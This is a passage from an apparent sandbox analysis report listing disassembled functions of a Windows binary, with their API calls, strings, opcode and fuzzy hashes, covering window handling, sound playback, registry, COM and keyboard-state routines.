                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2734957052-4033151799
                                                        • Opcode ID: 654fbcad5745776e85cc417b568fdde77ed12f8f7595578b3dad6b4c45bd3891
                                                        • Instruction ID: 5297c1115bdc3e15a0b0a1eadb02447f2d6c6f0b94e9881f5261f2207802c267
                                                        • Opcode Fuzzy Hash: 654fbcad5745776e85cc417b568fdde77ed12f8f7595578b3dad6b4c45bd3891
                                                        • Instruction Fuzzy Hash: A5318E71901129BFDB218B51DC88EFFBB7CEF46744F204169A909F2240DB309A4ADBB1
                                                        Function 00E5E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00E5E6B4
                                                          • Part of subcall function 00E0E551: timeGetTime.WINMM(?,?,00E5E6D4), ref: 00E0E555
                                                        • Sleep.KERNEL32(0000000A), ref: 00E5E6E1
                                                        • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00E5E705
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E5E727
                                                        • SetActiveWindow.USER32 ref: 00E5E746
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E5E754
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E5E773
                                                        • Sleep.KERNEL32(000000FA), ref: 00E5E77E
                                                        • IsWindow.USER32 ref: 00E5E78A
                                                        • EndDialog.USER32(00000000), ref: 00E5E79B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: BUTTON
                                                        • API String ID: 1194449130-3405671355
                                                        • Opcode ID: 0fdfb36644425f7ee00d26032721135abeaa5e77c2be9b6b1629855211af0b63
                                                        • Instruction ID: d3be2517054f6a53e4a0701c39d649e249dcae874acb3a02ef99c8ce235aa759
                                                        • Opcode Fuzzy Hash: 0fdfb36644425f7ee00d26032721135abeaa5e77c2be9b6b1629855211af0b63
                                                        • Instruction Fuzzy Hash: CC21A770200240AFEB045F22ECC9E253B69F75674EF202835F959B12A1DF729D0DAB35
                                                        Function 00E5E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E5EA5D
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E5EA73
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E5EA84
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E5EA96
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E5EAA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: SendString$_wcslen
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2420728520-1007645807
                                                        • Opcode ID: ff47241d698680075e08551aeeb6eb8280536bbb7cd9411017bb3a61f3212999
                                                        • Instruction ID: 5c54fbc4024d65ccdda8a0bf92b43b2341a1f82c01ff32c6e66c3d542b2282b2
                                                        • Opcode Fuzzy Hash: ff47241d698680075e08551aeeb6eb8280536bbb7cd9411017bb3a61f3212999
                                                        • Instruction Fuzzy Hash: 55119431A5025D79D724A7B1DC4ADFF6BBCEBD1B44F015829B901B20D1EEB00A04C5B0
                                                        Function 00E55CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000001), ref: 00E55CE2
                                                        • GetWindowRect.USER32(00000000,?), ref: 00E55CFB
                                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E55D59
                                                        • GetDlgItem.USER32(?,00000002), ref: 00E55D69
                                                        • GetWindowRect.USER32(00000000,?), ref: 00E55D7B
                                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E55DCF
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E55DDD
                                                        • GetWindowRect.USER32(00000000,?), ref: 00E55DEF
                                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E55E31
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00E55E44
                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E55E5A
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00E55E67
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                        • String ID:
                                                        • API String ID: 3096461208-0
                                                        • Opcode ID: 703e89c9137d8c56f6d158a65b4b994596d94b6f97927194728eae11b6784df4
                                                        • Instruction ID: 01926b64b0ff125e542216415cd14b45afe0dfa79f6c39a21986eb403aa6987d
                                                        • Opcode Fuzzy Hash: 703e89c9137d8c56f6d158a65b4b994596d94b6f97927194728eae11b6784df4
                                                        • Instruction Fuzzy Hash: 3C514F71A00605AFDF18CF69DD99AAE7BB5FF48701F208129F909F6290D7709E04CB60
                                                        Function 00E08BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E08F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E08BE8,?,00000000,?,?,?,?,00E08BBA,00000000,?), ref: 00E08FC5
                                                        • DestroyWindow.USER32(?), ref: 00E08C81
                                                        • KillTimer.USER32(00000000,?,?,?,?,00E08BBA,00000000,?), ref: 00E08D1B
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00E46973
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00E08BBA,00000000,?), ref: 00E469A1
                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00E08BBA,00000000,?), ref: 00E469B8
                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E08BBA,00000000), ref: 00E469D4
                                                        • DeleteObject.GDI32(00000000), ref: 00E469E6
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: 32402bb6ecd67bbd2c583b589b0de5738203c6ea149e40ec7352aeea7644754d
                                                        • Instruction ID: 9e6dec50ca5e4abc0c9c2b6578fb83261e51d36491ed8cf68bb747be63d4facc
                                                        • Opcode Fuzzy Hash: 32402bb6ecd67bbd2c583b589b0de5738203c6ea149e40ec7352aeea7644754d
                                                        • Instruction Fuzzy Hash: 6461D230101700DFDB259F15DA48B65B7F1FB8231AF20652DE086B69A0CB72ACC5DF62
                                                        Function 00E09838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00E09944: GetWindowLongW.USER32(?,000000EB), ref: 00E09952
                                                        • GetSysColor.USER32(0000000F), ref: 00E09862
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: cd9f179f0cea0e48fb44a8ac374d45762aa0d09c5a0f5531ef5fc50eea4ed1ba
                                                        • Instruction ID: 036985c7840b023e531b05cb5c1494936b24508fa20bd99f4637d72816de7529
                                                        • Opcode Fuzzy Hash: cd9f179f0cea0e48fb44a8ac374d45762aa0d09c5a0f5531ef5fc50eea4ed1ba
                                                        • Instruction Fuzzy Hash: FC41D6711046409FDB245F39AC88BB93B65EB47334F249615F9A6AB2E3C7319C82DB30
                                                        Function 00E28D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .
                                                        • API String ID: 0-3963672497
                                                        • Opcode ID: e6bde285b4eaa4e66e6a7c79d722ba585b99d832e49706bf1e20cef45daf9834
                                                        • Instruction ID: bd14979efd67cb0d96f5cee1eecb7a853e7fd634cc2d3d1b79492a0882f693c3
                                                        • Opcode Fuzzy Hash: e6bde285b4eaa4e66e6a7c79d722ba585b99d832e49706bf1e20cef45daf9834
                                                        • Instruction Fuzzy Hash: 7DC1E075E04269AFDB119FA8E841BEDBBB0AF09314F186199E515B7392CB309942CB60
                                                        Function 00E596E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00E3F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00E59717
                                                        • LoadStringW.USER32(00000000,?,00E3F7F8,00000001), ref: 00E59720
                                                          • Part of subcall function 00DF9CB3: _wcslen.LIBCMT ref: 00DF9CBD
                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00E3F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00E59742
                                                        • LoadStringW.USER32(00000000,?,00E3F7F8,00000001), ref: 00E59745
                                                        • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00E59866
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 747408836-2268648507
                                                        • Opcode ID: 2c631504211a657d9caffe7c15c88f42607f2825478884cec4b1474c6412f51c
                                                        • Instruction ID: 766f1d5bc394d885b52e31c78099c1e05138db20421f5bf2d7f7ce29387ed2c5
                                                        • Opcode Fuzzy Hash: 2c631504211a657d9caffe7c15c88f42607f2825478884cec4b1474c6412f51c
                                                        • Instruction Fuzzy Hash: B5416A7280021DAACB04EBE4CD96EFEB3B8EF15341F219425F60572092EA356F48CB71
                                                        Function 00E506DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00DF6B57: _wcslen.LIBCMT ref: 00DF6B6A
                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E507A2
                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E507BE
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E507DA
                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E50804
                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E5082C
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E50837
                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E5083C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                        • API String ID: 323675364-22481851
                                                        • Opcode ID: 04f41faf10029cf6c0da731ccf0a48eba97d20a2edbefcb9796edd9f525211c7
                                                        • Instruction ID: 0806d3a5b4a18eb84850113a8f458d4719600582e684cbf239f2d1a15b1af9b4
                                                        • Opcode Fuzzy Hash: 04f41faf10029cf6c0da731ccf0a48eba97d20a2edbefcb9796edd9f525211c7
                                                        • Instruction Fuzzy Hash: D841F672C1022DAEDF15EBA4DC95DEDB7B8EF44390F158529E915B2160EB709E08CBA0
                                                        Function 00E73C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 00E73C5C
                                                        • CoInitialize.OLE32(00000000), ref: 00E73C8A
                                                        • CoUninitialize.OLE32 ref: 00E73C94
                                                        • _wcslen.LIBCMT ref: 00E73D2D
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00E73DB1
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00E73ED5
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00E73F0E
                                                        • CoGetObject.OLE32(?,00000000,00E8FB98,?), ref: 00E73F2D
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00E73F40
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00E73FC4
                                                        • VariantClear.OLEAUT32(?), ref: 00E73FD8
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                        • String ID:
                                                        • API String ID: 429561992-0
                                                        • Opcode ID: 563af55ffb5babbc309c430783cbe5e174386246bcc995bcb63a368514870556
                                                        • Instruction ID: b2e7847f7c4a5168fc82735ad5ad9cd136541000010747e505b4483c960530af
                                                        • Opcode Fuzzy Hash: 563af55ffb5babbc309c430783cbe5e174386246bcc995bcb63a368514870556
                                                        • Instruction Fuzzy Hash: 28C177716083059FC744DF68C88496BB7E9FF89748F10991DF98AAB250D731EE05CB62
                                                        Function 00E67A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00E67AF3
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E67B8F
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00E67BA3
                                                        • CoCreateInstance.OLE32(00E8FD08,00000000,00000001,00EB6E6C,?), ref: 00E67BEF
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E67C74
                                                        • CoTaskMemFree.OLE32(?,?), ref: 00E67CCC
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00E67D57
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E67D7A
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00E67D81
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00E67DD6
                                                        • CoUninitialize.OLE32 ref: 00E67DDC
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                        • String ID:
                                                        • API String ID: 2762341140-0
                                                        • Opcode ID: aad3b9f3c7287c83116c14ba5e74a9d60e86259e92ade0d2f7fc2a784ae4a924
                                                        • Instruction ID: a1714a95e105f3ece075f820882a3be78028f71ed686fe957990558e59d72281
                                                        • Opcode Fuzzy Hash: aad3b9f3c7287c83116c14ba5e74a9d60e86259e92ade0d2f7fc2a784ae4a924
                                                        • Instruction Fuzzy Hash: C0C15C75A04109AFCB14DFA4D884DAEBBF9FF49348B148498E919EB361C730ED45CBA0
                                                        Function 00E8541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E85504
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E85515
                                                        • CharNextW.USER32(00000158), ref: 00E85544
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E85585
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E8559B
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E855AC
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CharNext
                                                        • String ID:
                                                        • API String ID: 1350042424-0
                                                        • Opcode ID: db9c477d616931c5b90c878398d711d02183157789898bbed6ff1156787d6ae8
                                                        • Instruction ID: 4fd251d22f9d07bc89afb91c80ee651f011996363e5157d8277d66863d19d36a
                                                        • Opcode Fuzzy Hash: db9c477d616931c5b90c878398d711d02183157789898bbed6ff1156787d6ae8
                                                        • Instruction Fuzzy Hash: 3A61AD32900608EFDF10AF95CC84AFE7BB9EF0A725F105155F92DB6290DB748A84DB61
                                                        Function 00E4FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E4FAAF
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00E4FB08
                                                        • VariantInit.OLEAUT32(?), ref: 00E4FB1A
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E4FB3A
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00E4FB8D
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E4FBA1
                                                        • VariantClear.OLEAUT32(?), ref: 00E4FBB6
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00E4FBC3
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E4FBCC
                                                        • VariantClear.OLEAUT32(?), ref: 00E4FBDE
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E4FBE9
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.3760140802.0000000000DF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00DF0000, based on PE: true
                                                        • Associated: 00000011.00000002.3759839747.0000000000DF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000E8C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3765847886.0000000000EBC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000011.00000002.3766084695.0000000000EC4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_df0000_6dbb7bdf47.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: 80f7dc0143b9068331993a3beee54696575846c1ba6297c1f45650b0e75b6c50
                                                        • Instruction ID: d36b7dc142d7a7a80437788c35ae891365f23decc810c9bd18b5bff4cd5b4229
                                                        • Opcode Fuzzy Hash: 80f7dc0143b9068331993a3beee54696575846c1ba6297c1f45650b0e75b6c50
                                                        • Instruction Fuzzy Hash: D2419034A00219DFCB00DFA4DC64DAEBBB9FF09744F118069E959B7261CB30A985CFA0
                                                        Function 00E59C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00E59CA1
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00E59D22
                                                        • GetKeyState.USER32(000000A0), ref: 00E59D3D
                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00E59D57
                                                        • GetKeyState.USER32(000000A1), ref: 00E59D6C
                                                        • GetAsyncKeyState.USER32(00000011), ref: 00E59D84
                                                        • GetKeyState.USER32(00000011), ref: 00E59D96
                                                        • GetAsyncKeyState.USER32(00000012), ref: 00E59DAE
                                                        • GetKeyState.USER32(00000012), ref: 00E59DC0
                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00E59DD8
                                                        • GetKeyState.USER32(0000005B), ref: 00E59DEA
